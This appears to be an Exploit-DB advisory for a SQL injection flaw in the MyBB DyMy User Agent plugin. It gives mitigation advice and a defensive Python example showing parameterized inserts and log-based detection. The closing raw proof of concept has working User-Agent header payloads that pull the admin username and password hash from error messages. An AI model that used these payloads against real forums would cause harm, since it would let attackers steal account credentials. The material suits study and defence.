Vendor: DyMy User Agent Plugin
By: JoinSe7en
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: DyMy User Agent Plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2012

MyBB DyMy User Agent Plugin SQL injection vulnerability.

The MyBB DyMy User Agent Plugin is vulnerable to SQL injection: the User-Agent header of an incoming request is written into a SQL query without being escaped. An attacker can send a specially crafted HTTP request with a malicious User-Agent header and, because the resulting MySQL error message (a "Duplicate entry" error) echoes the result of a subquery, read sensitive information such as usernames and password hashes. The proof of concept (PoC) below retrieves the username and the password hash of the uid=1 (admin) account this way.

Mitigation:

Input validation and filtering of all user-supplied input, including HTTP headers, helps limit SQL injection, but on its own it is not a reliable fix. The User-Agent value should reach the database only through the database layer's escaping routine or as a bound query parameter, never concatenated into the SQL text.
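The vulnerable insert beside its hardened form, plus a log-side detection heuristic for the attack described above, as an added example that is not part of this advisory or of the DyMy plugin's code. It assumes an in-memory sqlite3 table standing in for MySQL (so the MySQL-only functions in the PoC payload simply fail rather than leak anything), a hypothetical `user_agents` table, and constructed Apache combined-format log lines; the payload string is the one from the PoC below.

```python
"""Defensive view of the DyMy User Agent flaw: (1) how concatenating the User-Agent
header into SQL lets the header rewrite the query, and how a bound parameter stores the
same bytes harmlessly; (2) a heuristic that flags error-based SQL injection attempts in
web-server logs. sqlite3 stands in for MySQL here (an assumption), so the MySQL-only
functions in the PoC payload simply fail instead of leaking data."""
import re
import sqlite3

# Payload copied from the advisory's PoC User-Agent header (constructed test input).
POC_USER_AGENT = (
    "' and(select 1 from(select count(*),concat((select username from mybb_users "
    "where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #"
)


def store_user_agent(agent, uid=1, safe=True):
    """Insert `agent` for `uid` into a hypothetical user_agents table.

    safe=False splices the header into the SQL text (the bug class on this page);
    safe=True binds it as a parameter. Returns (ok, stored_value_or_error_text).
    """
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_agents (uid INTEGER, agent TEXT)")
    try:
        if safe:
            con.execute("INSERT INTO user_agents (uid, agent) VALUES (?, ?)", (uid, agent))
        else:
            # Vulnerable pattern: a quote in the header closes the string literal and
            # everything after it is parsed as SQL. Shown only to contrast with the fix.
            con.execute(f"INSERT INTO user_agents (uid, agent) VALUES ({int(uid)}, '{agent}')")
        row = con.execute("SELECT agent FROM user_agents WHERE uid = ?", (uid,)).fetchone()
        return True, row[0]
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return False, str(exc)
    finally:
        con.close()


# Apache/nginx "combined" log format; the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"\s*$'
)

# Each signal is one trait of error-based SQL injection carried in a header value.
SIGNALS = {
    "quote_then_boolean": re.compile(r"'\s*(and|or)\b", re.I),
    "subselect": re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "comment_tail": re.compile(r"(--|#|/\*)\s*$"),
}


def score_user_agent(ua):
    """Return the sorted names of the signals that fire on one User-Agent string."""
    return sorted(name for name, rx in SIGNALS.items() if rx.search(ua))


def detect_header_injection(log_lines, threshold=2):
    """Parse combined-format lines and report requests whose User-Agent trips
    at least `threshold` signals (one signal alone is too noisy to alert on)."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        hits = score_user_agent(m.group("ua"))
        if len(hits) >= threshold:
            findings.append({"ip": m.group("ip"), "request": m.group("req"), "signals": hits})
    return findings


# Constructed log lines: two benign clients (one with an apostrophe) and the PoC request.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Dec/2012:10:00:00 +0000] "POST /mybb/newreply.php?ajax=1 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0"',
    '192.0.2.11 - - [13/Dec/2012:10:00:02 +0000] "GET /mybb/index.php HTTP/1.1" '
    '200 9031 "-" "Bob\'s Browser/1.0"',
    '198.51.100.7 - - [13/Dec/2012:10:00:05 +0000] "POST /mybb/newreply.php?ajax=1 HTTP/1.1" '
    '200 98 "-" "' + POC_USER_AGENT + '"',
]

if __name__ == "__main__":
    for ua in ("Bob's Browser/1.0", POC_USER_AGENT):
        print("unsafe:", store_user_agent(ua, safe=False))
        print("safe:  ", store_user_agent(ua, safe=True)[0])
    for f in detect_header_injection(SAMPLE_LOG):
        print("ALERT", f["ip"], f["request"], f["signals"])
```

The apostrophe in "Bob's Browser/1.0" makes the point that concatenation breaks on ordinary input as well as on attacks, while the bound parameter stores both strings verbatim; the detector deliberately requires two independent signals before alerting, since a lone `#` or `select` in a User-Agent is common enough to drown an analyst in noise.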
Source

Exploit-DB raw data:

############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en                                                        #
# Date : 13 Dec 2012                                                       #
# Tested on : Linux                                                        #
# Category : Web Applications                                              #
# Software Link : http://mods.mybb.com/view/dymy-user-agent                #
############################################################################


[*] PoC (receive admin username)

We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:

SQL Error:
1062 - Duplicate entry 'admin1' for key 'group_key'

+------------------------------------------------------------------+

[*] PoC (receive admin password)

We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error:
1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'

+------------------------------------------------------------------+


Enjoy.